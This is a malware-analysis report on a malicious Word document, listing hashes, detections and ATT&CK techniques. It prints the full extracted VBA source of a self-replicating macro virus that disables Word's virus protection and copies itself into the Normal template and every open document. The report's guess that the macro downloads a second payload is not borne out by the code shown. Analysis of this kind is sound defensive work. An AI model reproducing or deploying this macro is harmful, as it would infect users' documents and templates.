Office (OLE) malware analysis — malicious · cdbf8397706b448b

MALICIOUS

Office (OLE)

35.5 KB Created: 2009-04-17 15:44:00 Authoring application: Microsoft Word 11.5.3 First seen: 2020-09-15

MD5: 86be2e1092fc8553d045a1c98ccd2a87 SHA-1: 2dd1b99c3d0d8bdea6201350cbb74d65ae3335e9 SHA-256: cdbf8397706b448b1d261c71e885aa793ac033a691ba14f4d9cfd351f69b617a

120 Risk Score

Malware Insights

MITRE ATT&CK

T1059.005 Visual Basic T1566.001 Spearphishing Attachment

The sample contains a high-severity heuristic firing for OLE_VBA_DOCOPEN, indicating the presence of a Document_Open macro. This macro is designed to execute automatically when the document is opened. The VBA code attempts to manipulate the NormalTemplate and other open documents, likely to ensure persistence or to download and execute a secondary payload. The ClamAV detection 'Doc.Trojan.Thus-16' further confirms its malicious nature.

Heuristics 3

ClamAV: Doc.Trojan.Thus-16 critical CLAMAV_DETECTION

ClamAV detected this file as malware: Doc.Trojan.Thus-16
VBA macros detected medium 1 related finding OLE_VBA_MACROS

Document contains VBA macro code
Document_Open macro high OLE_VBA_DOCOPEN

Document_Open macro

Extracted artifacts 1

Files carved from inside the sample during analysis.

Filename Kind Source Size

macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 1958 bytes

Filename	Kind	Source	Size
`macros.bas`	vba-macro	oletools.olevba.extract_macros (decoded VBA source)	1958 bytes
SHA-256: `cddc63f2636e26dfbfde9560c0071857ad6cd5abc8e10de5320ebe546e8d3f5d`
Preview script First 1,000 lines of the extracted script Attribute VB_Name = "ThisDocument" Attribute VB_Base = "1Normal.ThisDocument" Attribute VB_Creatable = False Attribute VB_PredeclaredId = True Attribute VB_Exposed = True Attribute VB_TemplateDerived = True Attribute VB_Customizable = True Private Declare Function ExitWindowsEx Lib "user32" (ByVal uFlags As Long, ByVal dwReserved As Long) As Long Private Sub Document_Open() 'Mat1' On Error Resume Next Application.Options.VirusProtection = False If NormalTemplate.VBProject.VBComponents.Item(1).CodeModule.Lines(3, 1) <> "'Mat1'" Then NormalTemplate.VBProject.VBComponents.Item(1).CodeModule.DeleteLines 1, _ NormalTemplate.VBProject.VBComponents.Item(1).CodeModule.CountOfLines End If If NormalTemplate.VBProject.VBComponents.Item(1).CodeModule.CountOfLines = 0 Then NormalTemplate.VBProject.VBComponents.Item(1).CodeModule.InsertLines _ 1, ActiveDocument.VBProject.VBComponents.Item(1).CodeModule.Lines _ (1, ActiveDocument.VBProject.VBComponents.Item(1).CodeModule.CountOfLines) End If If NormalTemplate.Saved = False Then NormalTemplate.Save For k = 1 To Application.Documents.Count If Application.Documents.Item(k).VBProject.VBComponents.Item(1).CodeModule.Lines(3, 1) <> "'Mat1'" Then Application.Documents.Item(k).VBProject.VBComponents.Item(1).CodeModule.DeleteLines _ 1, Application.Documents.Item(k).VBProject.VBComponents.Item(1).CodeModule.CountOfLines End If If Application.Documents.Item(k).VBProject.VBComponents.Item(1).CodeModule.CountOfLines = 0 Then Application.Documents.Item(k).VBProject.VBComponents.Item(1).CodeModule.InsertLines _ 1, NormalTemplate.VBProject.VBComponents.Item(1).CodeModule.Lines _ (1, NormalTemplate.VBProject.VBComponents.Item(1).CodeModule.CountOfLines) End If Next k End Sub Private Sub Document_New() Document_Open End Sub

SHA-256: cddc63f2636e26dfbfde9560c0071857ad6cd5abc8e10de5320ebe546e8d3f5d

Preview script

First 1,000 lines of the extracted script

Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Private Declare Function ExitWindowsEx Lib "user32" (ByVal uFlags As Long, ByVal dwReserved As Long) As Long
Private Sub Document_Open()
'Mat1'
   On Error Resume Next
   Application.Options.VirusProtection = False
   If NormalTemplate.VBProject.VBComponents.Item(1).CodeModule.Lines(3, 1) <> "'Mat1'" Then
   NormalTemplate.VBProject.VBComponents.Item(1).CodeModule.DeleteLines 1, _
   NormalTemplate.VBProject.VBComponents.Item(1).CodeModule.CountOfLines
   End If
   
   If NormalTemplate.VBProject.VBComponents.Item(1).CodeModule.CountOfLines = 0 Then
   NormalTemplate.VBProject.VBComponents.Item(1).CodeModule.InsertLines _
   1, ActiveDocument.VBProject.VBComponents.Item(1).CodeModule.Lines _
   (1, ActiveDocument.VBProject.VBComponents.Item(1).CodeModule.CountOfLines)
   End If
   
   If NormalTemplate.Saved = False Then NormalTemplate.Save
   
   For k = 1 To Application.Documents.Count
    If Application.Documents.Item(k).VBProject.VBComponents.Item(1).CodeModule.Lines(3, 1) <> "'Mat1'" Then
        Application.Documents.Item(k).VBProject.VBComponents.Item(1).CodeModule.DeleteLines _
        1, Application.Documents.Item(k).VBProject.VBComponents.Item(1).CodeModule.CountOfLines
    End If
    If Application.Documents.Item(k).VBProject.VBComponents.Item(1).CodeModule.CountOfLines = 0 Then
        Application.Documents.Item(k).VBProject.VBComponents.Item(1).CodeModule.InsertLines _
        1, NormalTemplate.VBProject.VBComponents.Item(1).CodeModule.Lines _
        (1, NormalTemplate.VBProject.VBComponents.Item(1).CodeModule.CountOfLines)
    End If
   Next k
End Sub

Private Sub Document_New()
    Document_Open
End Sub

Open this report in the interactive analyzer, or submit your own file for analysis.